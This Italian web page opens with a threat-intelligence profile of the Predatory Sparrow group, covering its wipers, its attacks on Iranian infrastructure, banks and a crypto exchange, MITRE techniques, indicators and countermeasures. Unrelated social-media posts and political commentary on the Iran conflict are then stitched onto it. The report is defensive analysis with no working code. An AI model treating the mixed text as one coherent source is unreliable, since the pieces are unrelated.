Il gruppo dimostra capacità tecniche avanzate che lasciano intendere l’accesso a risorse significative, una conoscenza approfondita dei sistemi industriali iraniani, nonché la capacità di sviluppare malware su misura per obiettivi specifici. Inoltre, evidenzia competenze rilevanti nei sistemi SCADA e ICS (Industrial Control Systems), utilizzati nel controllo di infrastrutture critiche. Rispetto alla maggior parte degli hacktivisti che intervengono su tematiche geopolitiche o di attualità, Predatory Sparrow si distingue per un know-how tecnico notevolmente superiore, che risulta tipico di attori collegati ad apparati statuali.
Settori di Specializzazione
Sistemi di Controllo Industriale (ICS/SCADA)
Capacità di manipolare equipaggiamento industriale
Accesso a sistemi di controllo di acciaierie e pompe di benzina
Interferenza con sistemi ferroviari
Sistemi di Pagamento
Compromissione di reti point-of-sale
Attacchi a sistemi di carte di sussidio carburante
Compromissione di Crypto Exchange
Compromissione di enti finanziari
Infrastrutture Critiche
Sistemi ferroviari nazionali
Reti di distribuzione carburante
Impianti siderurgici
TOOLSET E MALWARE
Sulla base delle informazioni attualmente disponibili, si ritiene che il gruppo sia in possesso di varianti del wiper “Meteor”, comparso per la prima volta nel 2021 e utilizzato da un threat actor denominato “Indra” contro infrastrutture siriane. Questo fattore potrebbe indicare una parziale sovrapposizione tra i due threat actor.
Lo strain di “Meteor” comprende diverse versioni, note come “Stardust” e “Comet”, sempre con funzionalità di wiper. “Chaplin” risulta invece essere il malware utilizzato nell’attacco alle acciaierie iraniane, non dotato di capacità di cancellazione dei dati ma di compromissione e controllo dei sistemi industriali.
Meteor Express (2021)
Meteor Express è un malware di tipo wiper a tre stadi, sviluppato tramite una combinazione di componenti open source e software legacy. Il codice è altamente modulare e progettato per operazioni distruttive mirate a infrastrutture strategiche.
Funzionalità principali
Sovrascrittura e cancellazione di file di sistema.
Blocco dell’accesso utente e terminazione dei processi.
Contesto operativo Attacco lanciato nel luglio 2021 contro la rete ferroviaria iraniana. L’obiettivo apparente era la destabilizzazione dell’infrastruttura pubblica e la generazione di caos operativo su larga scala.
Attribuzione Malware attribuito al gruppo Indra.
Valutazione di impatto
Tecnico: Paralisi totale del sistema informatico ferroviario, con disservizi prolungati e blocchi operativi.
Psicologico: Tentativo di disorientare l’opinione pubblica iraniana attraverso il sabotaggio simbolico.
Obiettivo operativo: Operazione PSYOPS volta a delegittimare il governo iraniano e dimostrare la vulnerabilità delle infrastrutture pubbliche strategiche.
Indicatori di Compromissione (IoCs)
Directory di staging: %temp%\Meteor\
Comet (2021)
Malware wiper simile a Meteor ma privo di payload provocatori. Architettura a tre stadi, con codice misto tra componenti open e legacy.
Uso in attacchi silenziosi contro infrastrutture critiche.
Attribuzione
Malware attribuito al gruppo Indra.
Valutazione di impatto
Tecnico: Elevato.
Psicologico: Consistente, in quanto crea disservizio e mina la fiducia nelle infrastrutture statali
Obiettivo operativo: Sabotaggio silenzioso e persistente.
Stardust (2020)
Wiper distruttivo impiegato in attacchi mirati contro obiettivi siriani. Simile a Comet, ma specificamente orientato alla distruzione sistematica dei dati sensibili.
Data: Ottobre 2021 Obiettivo: Oltre 4.000 stazioni di servizio in Iran (sistema di distribuzione carburante) Metodo d’attacco: Compromissione dei sistemi point-of-sale Impatto:
Disattivazione del sistema di pagamento con carte sovvenzionate
Paralisi temporanea della distribuzione di carburante su scala nazionale
MITRE ATT&CK TTPs:
T1190 (Exploit Public-Facing Application)
T1486 (Data Encrypted for Impact)
Malware/Toolset: Non noto Attribution: Predatory Sparrow Impatto Strategico: Interruzione dei servizi essenziali per aumentare la pressione interna
Attacco alle Acciaierie Iraniane
Data: Giugno 2022 Obiettivo: Tre principali acciaierie iraniane (Khouzestan, Mobarakeh, HOSCO)
Metodo d’attacco: Malware Chaplin + manipolazione dei sistemi di controllo industriale (ICS) Impatto:
Fuoriuscita di acciaio fuso (oltre 1.300°C)
Incendio nell’impianto
Interruzione delle operazioni produttive
MITRE ATT&CK TTPs:
T0859 (Manipulation of Control)
T0882 (Loss of Safety)
T0814 (Alarm Suppression)
Malware/Toolset: Chaplin Attribution: Predatory Sparrow Impatto Strategico: Danneggiamento delle capacità industriali critiche e dimostrazione di capacità offensive contro ICS Figura 1 – Telecamera sorveglianza
Riattivazione – Conflitto Gaza-Israele
Data: Ottobre 2023 Contesto: Conflitto israelo-palestinese Messaggio: “Pensate che questo faccia paura? Siamo tornati.” Obiettivo: Nuovi attacchi a stazioni di servizio in Iran Metodo d’attacco: Continuazione della strategia disruption verso infrastrutture civili Impatto: Non specificato nel dettaglio ma coerente con attacchi precedenti MITRE ATT&CK TTPs: presumibilmente analoghi all’evento di Ottobre 2021 Attribution: Predatory Sparrow Impatto Strategico: Segnale politico e ritorsione cibernetica in chiave geopolitica
Attacco Bank Sepah
Data: 17 giugno 2025
Obiettivo: Bank Sepah – uno degli istituti finanziari pubblici più antichi dell’Iran Metodo d’attacco: Attacchi informatici distruttivi con probabile uso di wiper (es. Comet/Stardust) Impatto:
Interruzione delle operazioni bancarie
Impossibilità per i cittadini di prelevare denaro dagli sportelli ATM
Diffusione di CVE pubblici da parte dell’attore (es. cve_poc_codes_export_works.csv)
MITRE ATT&CK TTPs:
T1485 (Data Destruction)
T1499 (Endpoint Denial of Service)
T1588.006 (Vulnerability Disclosure)
Malware/Toolset: Presunta variante wiper simile a Meteor / Comet / Stardust Attribution: Predatory Sparrow (evidenza su Telegram + X) Impatto Strategico: Destabilizzazione del sistema bancario nazionale e perdita di fiducia nella capacità del governo iraniano di proteggere dati finanziari
Al momento non si conoscono dettagli sulle tecniche, tattiche e procedure (TTP) utilizzate dal threat actor, benché la cancellazione dei dati con conseguente paralisi delle operazioni faccia propendere per l’ipotesi dell’impiego di una versione dei wiper “proprietari” del gruppo, come Meteor, Stardust o Comet. Nella giornata del 16/06, sul proprio canale Telegram il gruppo aveva diffuso una lista di cve ancora funzionati, dal titolo “cve_poc_codes_export_works”. Figura 2 – Cve diffusa su canale Telegram del TA
Secondo fonti presenti su X, i cittadini iraniani erano impossibilitati a prelevare denaro contante dagli ATM del Paese. Figura 3 – Sportello banca in disservizio
Tale fattore, unito ai timori relativi al furto di dati sensibili dalle banche colpite, contribuisce all’aggravamento dello scenario e sottolinea le capacità da cyberwar in possesso del Threat Actor. Figura 4 – Documentazione Bank Sepah
A differenza di molti hacktivisti, infatti, Predatory Sparrow non si è limitato ad un Denial of Service (DoS), ma ha mostrato capacità tecnologiche avanzate e determinazione nel procurare danni su vasta scala.
Al momento non si hanno informazioni ulteriori sullo stato dei servizi erogati dalle banche colpite ma, nel caso in cui tali disservizi dovessero protrarsi, ciò rappresenterebbe un danno considerevole alla capacità dell’Iran di rispondere alle minacce cibernetiche e potrebbe contribuire a generare malcontento e tensioni tra la popolazione colpita.
Attacco Nobitex
Data: 18 giugno 2025
Obiettivo: Nobitex – sito iraniano di crypto exchange Metodo d’attacco: Al momento non si hanno informazioni inerenti alla metodologia di attacco utilizzata Impatto:
Distruzione asset crypto per un totale di 90 milioni di dollari
Sito nobitex[.].ir ancora offline a 24h dall’attacco
MITRE ATT&CK TTPs:
T1485 (Data Destruction)
T1499 (Endpoint Denial of Service)
T1588.006 (Vulnerability Disclosure)
Malware/Toolset: Presunta variante wiper simile a Meteor / Comet / Stardust Attribution: Predatory Sparrow Impatto Strategico: Destabilizzazione del sistema valutario di crypto exchange iraniano. Recisione di una linea di finanziamento che permetteva all’Iran di aggirare, parzialmente, le sanzioni occidentali. Effetti psicologici come la diffusione di panico e incertezza riguardo la resilienza degli asset iraniani nel cyberspazio. Figura 5 – Nobitex[.]ir ancora irraggiungibile nella giornata del 19/06, a un giorno dall’attacco
Predatory Sparrow ha attaccato il sito di exchange di criptovalute iraniano “Nobitex” nella giornata del 18 giugno, soltanto un giorno dopo l’attacco a Sepah Bank. La motivazione dichiarata è la medesima, ovvero l’evasione delle sanzioni imposte all’Iran e il finanziamento del terrorismo. Su X, Predatory Sparrow ha anche sottolineato il nesso tra le attività del regime e quelle di Nobitex, dichiarando che, per il governo iraniano, il servizio presso l’exchange di criptovalute è considerato alla stregua del servizio militare.
Il Threat Actor non ha sottratto le criptovalute, ma ne ha di fatto bruciato un ammontare pari a 90 milioni di dollari, inviandole verso indirizzi inutilizzabili (“burn addresses”), da cui non possono essere recuperate. La tecnica adoperata sottolinea l’obiettivo di Predatory Sparrow di arrecare danno senza alcuna finalità di monetizzazione o finanziamento, come sotteso anche dal ricorso ai wiper.
In data 20/06/2025 threat actor ha inoltre reso pubblico il source code di Nobitex, mettendo a rischio gli asset ancora presenti sul sito e rendendo più facile l’accesso e l’exploit da parte di ulteriori attori malevoli. Questa divulgazione del codice sorgente amplifica la vulnerabilità del sistema, consentendo agli aggressori di identificare rapidamente punti deboli e sviluppare exploit mirati. Figura 6 – Post con cui Predatory Sparrow rende pubblico il codice sorgente di Nobitex, https://x.com/GonjeshkeDarand/status/1935593397156270534
Al momento non si hanno ulteriori dettagli sulle tecniche, tattiche e procedure (TTP) utilizzate dal threat actor in questa operazione.
VALUTAZIONE DEL RISCHIO
Livello di Minaccia: ALTO
Determinanti di minaccia: – Capacità dimostrate di causare danni fisici – Accesso persistente a infrastrutture critiche – Sofisticazione tecnica in crescita – Motivazione geopolitica forte
Settori a rischio: – Infrastrutture energetiche – Sistemi di trasporto – Industria pesante – Sistemi di pagamento – Settore bancario e finanziario
Indicatori di Attacco (IoA)
Presenza di file denominati “Chaplin”
Messaggi di sistema con riferimenti al numero 64411
Disconnessioni anomale dalla rete
Malfunzionamenti di sistemi industriali coordinati
Indirizzi wallet crypto recanti messaggi diretti contro le Guardie della repubblica islamica (Islamic Republic Guard Corps IRGC) del tipo “F*ckIRGCterrorists”
CONTROMISURE
Sulla base delle evidenze presentate all’interno del report, si formulano alcune raccomandazioni e contromisure utili a minimizzare o contenere danni provenienti dall’attore qui descritto o da eventuali gruppi emulatori. Considerata la mancanza di informazioni dettagliate sulle compromissioni, a fronte della mancata disclosure da parte degli enti iraniani colpiti, si presentano qui alcune considerazioni generali atte a ridurre l’impatto dei malware tipo “wiper” come Meteor e di altri tool utilizzati in contesti di cyber warfare e cyber-espionage come InfoStealer e SpyWare. Inoltre, considerando la presenza di un elenco di CVE con i relativi link alle Proof of Concept pubblicate direttamente dal Threat Actor sul proprio canale Telegram, dove viene evidenziato che si tratta di exploit ancora funzionanti, si può ipotizzare che Predatory Sparrow utilizzi anche applicazioni esposte e vulnerabili come vettore di accesso iniziale, verranno pertanto suggerite delle raccomandazioni per proteggere la superficie di attacco esposta.
Al fine di contenere la propagazione di un wiper all’interno della rete, è opportuno adattare una segmentazione rigida, che separi reti OT da IT, anche attraverso il ricorso ad architetture Zero Trust e stretto controllo degli accessi.
Al tempo stesso, il backup separato, air-gapped, associato a piani di ripristino e disaster recovery, consente il recupero della normale operatività in caso di compromissione.
Il patching, la chiusura delle porte superflue esposte su internet e la disabilitazione dei servizi non necessari sono altresì misure utili a ridurre la superficie di attacco e a minimizzare il rischio derivante dalle applicazioni esposte.
Honeypot ICS/SCADA consentono inoltre di rilevare anomalie e intrusioni prima che attori malevoli raggiungano le aree critiche per l’operatività industriale.
trump dice che è stato un successo "spettacolare". qualcuno si interroga sulla scelta di questa parola da parte di un capo di stato che ha lanciato un attacco militare che ha anche spezzato vite? sarà stato un successo. un successo importante. ma "spettacolare". cosa è un film? uno spettacolo? oppure sono comunque morte persone vere nell'attacco? il cinismo di questo presidente è veramente RIPUGNANTE.
@simona detto da uno che qualche giorno fa ha scritto sul suo social "stiamo decidendo se uccidere Khamenei o meno", ormai ci si può aspettare di tutto.
ma daltronde con altre parole ha detto che i palestinesi potevano essere estinti e usati sui muri come trofei tipo pelli di orsi o loro teste... dietro gli applausi di netaniau... veramente distopico questo mondo. prima in maniera subdola. adesso apertamente distopico. siamo in una di quelle realtà alterative dove finisce davvero male. tipo il mondo distrutto di stranger things...
un po' distopico è sempre apparso. ma nel bene o nel male con kissinger che ha "regnato" 40 anni la politica usa almeno è stata costante (centro america, sud america, o iraq probabilmente non sarebbe così tollerante come io sto parlando). sapevi cosa aspettarti. e poi questo è proprio un buffone. e di certo non parla chiaramente.
"La caduta di Fordow: gli Usa abbattono il bunker simbolo del nucleare iraniano". ecco. esatto. probabilmente la parola chiave è proprio solo "simbolo". da verificare che davvero ci fosse qualcosa.
@Giornalismo e disordine informativo articolo21.org/2025/06/strage-… Daria Bonfietti, Presidente Associazione Parenti Vittime Strage di Ustica, a ridosso del 45° anniversario della Strage di Ustica, fa il punto, sulle motivazioni della richiesta di archiviazione da parte della Procura della
@Privacy Pride Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/psylo/ Anche oggi Claudia ci regala uno squarcio del suo mondo e prova per noi un browser... perché i browser non sono affatto tutti uguali e, a volte, si fa fatica a distinguere quelli buoni da quelli cattivi. CB Da tempo immemore seguo con attenzione le…
la ricarica, oltre essere costosa, e lenta, devi stare anche li con l'angoscia di calcolare esattamente quanto durerà la ricarica e andare a riprendere l'auto di corsa? capisco il loro punto di vista ma per l'automobilista a me appare sempre più scomoda... e da moli punti di vista.
@simona di solito l'auto (almeno la mia) mi indica l'orario di fine carica. Se conosci un po' la tua auto sai quanto impiega a caricare. Tutte le app avvisano quando la carica è completata. Il supplemento non scatta subito appena finito, ma ti dà il tempo per recuperare l'auto (di solito 1 ora, ma è meglio verificare dall'app). Ergo: uno se la va a cercare
@Alberto V ok... se dite che è così comodo... io rimango con il GPL. spendo di meno e non mi rincorre nessuno. dal mio punto di vista parcheggio l'auto, se è un parcheggio con ricarica meglio, e poi se ho voglia e quando ho voglia la vado a spostare. non sono la balia dell'auto. ma questa è una necessità personale mia. può piacere uscire di casa alle 3 di notte per andare a recuperare l'auto parcheggiata. per me è uno stress. un po' come avere il cane da portare fuori.
A San Pietroburgo dice di essere andato per vedere con i suoi occhi qual è la vera situazione dopo l'invasione russa in Ucraina, non certo per i soldi del cachet.
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁) Uno stop di 10 anni alla regolamentazione dell'intelligenza artificiale da parte degli stati americani: è la richiesta dei lobbisti di Amazon, Google, Microsoft e non solo. Ma sia il settore tech che il Partito repubblicano
Gli Stati Uniti hanno bombardato l’Iran. La ragione principale per cui Trump ha preso questa decisione è che Israele, con il passare dei giorni, versava in una condizione sempre più disperata. Trump ha bombardato l’Iran per quattro ragioni fondamentali. [...]
@Giornalismo e disordine informativo articolo21.org/2025/06/netanya… Con l’ingresso degli USA nella guerra tra Israele e Iran si è aperta la fase più pericolosa dell’ultimo decennio in Medio Oriente. Un tragico destino ha fatto sì che due lunatici come Netanyahu e Trump si
Stand-up for EMERGENCY è lo spettacolo comico in cui 11 artistə si esibiscono “in piedi” in supporto a EMERGENCY. Per ricordarci che anche la risata può esse...
L’Alleanza si confronta con una crescente competizione tra grandi potenze, da un lato una Russia revisionista e dall’altro una Cina sempre più potente sul piano economico e militare. Le minacce terroristiche persistono. Le tecnologie emergenti e la
Dal 7 ottobre 2023, Israele ha coltivato una psiche nazionale in cui la sopravvivenza ebraica sembra dipendere dalla distruzione dell'altro.
Di Hanin Majadli - 20 giugno 2025
Mentre mi riparo da un bombardamento missilistico iraniano in un parcheggio sotterraneo, mi siedo e rifletto su come gli anni della mia vita vengano sprecati nelle guerre di Israele, guerre che non mi riguardano. Mi chiedo se siano proprio le provocazioni di Israele, le sue furie sconsiderate, a causare un giorno la mia fine. Sarebbe una triste ironia.
Dal 7 ottobre 2023, Israele ha abbandonato la dottrina della deterrenza, un tempo nota come "Muro di Ferro", in favore di qualcosa di molto più pericoloso: una mentalità di distruzione e annientamento. Forse quell'impulso è sempre stato lì, sepolto sotto la superficie, ma ora è allo scoperto ed esplicitamente dichiarato. Non si tratta di un semplice cambiamento tattico, ma di una profonda trasformazione della coscienza, della visione del mondo, forse persino di una psiche collettiva ferita e segnata.
Quando Israele ha smesso di parlare di contenimento e deterrenza e ha iniziato a parlare invece di Cancellazione? Quando l'obiettivo ha smesso di essere la sicurezza ed è diventato, invece, l'eliminazione dell'altro, la sua esistenza, le sue istituzioni, persino il suo diritto di esistere come nemico?
Secondo questa logica, qualsiasi cosa disturbi la vista degli israeliani, che si tratti di una stazione televisiva, di un'università, di un quartiere residenziale o di una stazione di servizio, diventa un legittimo bersaglio da distruggere. È così che sono state bombardate le università di Gaza e Teheran, e come sono stati uccisi scienziati, giornalisti, artisti e scrittori. Israele non si limita più a obiettivi militari; distrugge le stesse condizioni che sostengono la vita e la possibilità di ricostruire.
Tutto questo avviene in nome dell'"autodifesa". Ma questa non è più una risposta a una minaccia concreta, bensì un'offensiva guidata da una visione del mondo sfrenata, priva di confini morali, legali o persino pragmatici. Israele cerca di essere l'unica Potenza Dominante in Medio Oriente. E se il Diritto Internazionale avesse ancora un peso reale, beh, Israele lo viola ripetutamente a Gaza, in Libano, in Siria e in Iran. Tanto che, con ogni attacco, sega proprio il ramo su cui poggia l'idea del Diritto Internazionale.
Israele rivendica per sé il diritto di violare, colpire e bombardare, ripetutamente, anche coloro che non rappresentano più una minaccia immediata. La continua distruzione di Gaza non fa che sottolineare questo messaggio. Tutto ciò crea un pericoloso precedente con implicazioni di vasta portata: cosa si sentiranno in diritto di fare le altre nazioni nelle loro guerre? Dov'è il confine tra ciò che è permesso e ciò che non lo è? E cosa succede quando altri stati adottano la stessa logica israeliana nei confronti dei loro nemici? Una catastrofe.
E gli israeliani stessi? Fin dalla sua fondazione, e ancor di più dal 7 ottobre 2023, Israele ha coltivato una psiche nazionale in cui la sopravvivenza ebraica sembra dipendere dalla distruzione dell'altro. Cosa farebbero gli israeliani se altri Paesi si prendessero le stesse libertà che Israele si prende per sé? Il linguaggio, le dichiarazioni, il tono di politici, giornalisti e cittadini rivelano tutti la stessa verità: non c'è cura. Gli israeliani sono ciechi, prigionieri e istigati.
E forse la cosa più spaventosa è che questa logica non sembra più estrema, ma è diventata la norma; che la società israeliana, con le sue istituzioni, i suoi consiglieri, i suoi giornalisti, i suoi genitori e i suoi figli, abbia imparato a pensare in questo modo. Il linguaggio stesso è cambiato, e i bambini israeliani cresceranno immersi in esso, ignari dell'esistenza di un'altra strada. Le regole che Israele sta consolidando attraverso la sua aggressiva condotta militare scuoteranno non solo la Regione, ma il mondo intero per molti anni a venire.
Vi sarà sicuramente capitato di comprare qualche piccolo oggetto in un negozio Mediaworld, una scheda SD, una chiavetta USB, ecc.
Avete notato quanta plastica ha intorno? Tra l'altro anche una plastica estremamente resistente e difficile da aprire.
La settimana scorsa la porta USB del mio #Fairphone ha cominciato a dare problemi quindi sono andato sul sito e ne ho comprata una nuova (25 €).
È arrivata qualche giorno fa in una ragionevole confezione in cartoncino certificato FSC (Forest Stewardship Council), con stampa in inchiostro di soia (chissà, magari con un filino di olio sopra è pure saporita 😁) e all'interno di una piccola bustina.
Ma quindi si possono vendere cose anche senza inscatolarle in grossi contenitori di plastica antiproiettile?
Beh... se te ne importa qualcosa dell'ambiente evidentemente sì.
@Privacy Pride Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/bipensie… Il cortocircuito del giorno e il bipensiero del Garante Privacy. O, più probabilmente, sono io che non capisco. Il Garante Privacy ha recentemente sanzionato Regione Lombardia per aver conservato i LOG di alcuni sistemi per 90 giorni, in assenza di accordo
@Giornalismo e disordine informativo articolo21.org/2025/06/attacco… Appare evidente come l’attacco USA all’Iran sposti ancora più pericolosamente il quadro delle relazioni internazionali in un momento di grande difficoltà: oggi scrivere di scontro a livello planetario è molto più realistico che non rispetto (addirittura) a qualche giorno fa. Premessa la necessità di un
Figuriamoci, gli autoproclamati sceriffi del mondo,i criminali a stelle e strisce, non potevano lasciar perdere l'occasione per fare l'ennesima guerra.
Gli Stati Uniti hanno attaccato l'Iran. Trump: "Colpiti 3 siti nucleari". Teheran: "Ora comincia la guerra". Due ondate di missili su Israele: "Ingenti distruzioni a Tel Aviv" - Il Fatto Quotidiano ilfattoquotidiano.it/live-post…
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁) La multinazionale britannica nota per aspirapolveri e ventilatori prova a reinventarsi e affronta il momento cruciale del passaggio di testimone: Zone è stato il primo prodotto voluto da Jake Dyson, figlio del fondatore James, da quando ha integrato Jake Dyson Products nel
@qwe Dyson Zone è un dispositivo elettronico estremamente avanzato. C'è più informatica in Dyson Zone che negli auricolari di Apple, però nessuno si stupisce se un articolo sugli air qualcosa viene pubblicato su @Informatica (Italy e non Italy 😁)
Alla fine, gli USA restano uguali a se stessi. Una affettuosa carezza sulla testa degli inutili idioti di casa nostra, che vedevano la fine delle guerre infinite americane. Ricordate: più stupido di un trumpiano americano c'è un italiano trumpiano.
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁) Solo le tre app più popolari per il tracciamento del ciclo mestruale hanno registrato circa 250 milioni di download globali nel 2024 e si stima che la femtech
All of it is done in the name of "self-defense." But this is no longer a response to any concrete threat, but an offensive driven by an unrestrained worldview | Opinion | Hanin Majadli haaretz.com/opinion/2025-06-20…
Simon Perry
in reply to simona • •@simona detto da uno che qualche giorno fa ha scritto sul suo social "stiamo decidendo se uccidere Khamenei o meno", ormai ci si può aspettare di tutto.
Ma non ci si abitua. Io, per lo meno, no
simona
in reply to Simon Perry • •simona
in reply to simona • •Simon Perry likes this.
Simon Perry
in reply to simona • •@simona sai qual è la cosa più triste? Che man mano che persone come noi vengono a mancare, nessuno si ricorderà del mondo prima della distopia.
Diventerà tutto normale, l'unica opzione immaginabile.
Per tanto, tanto tempo, temo.
simona
in reply to simona • — (Livorno) •Simon Perry likes this.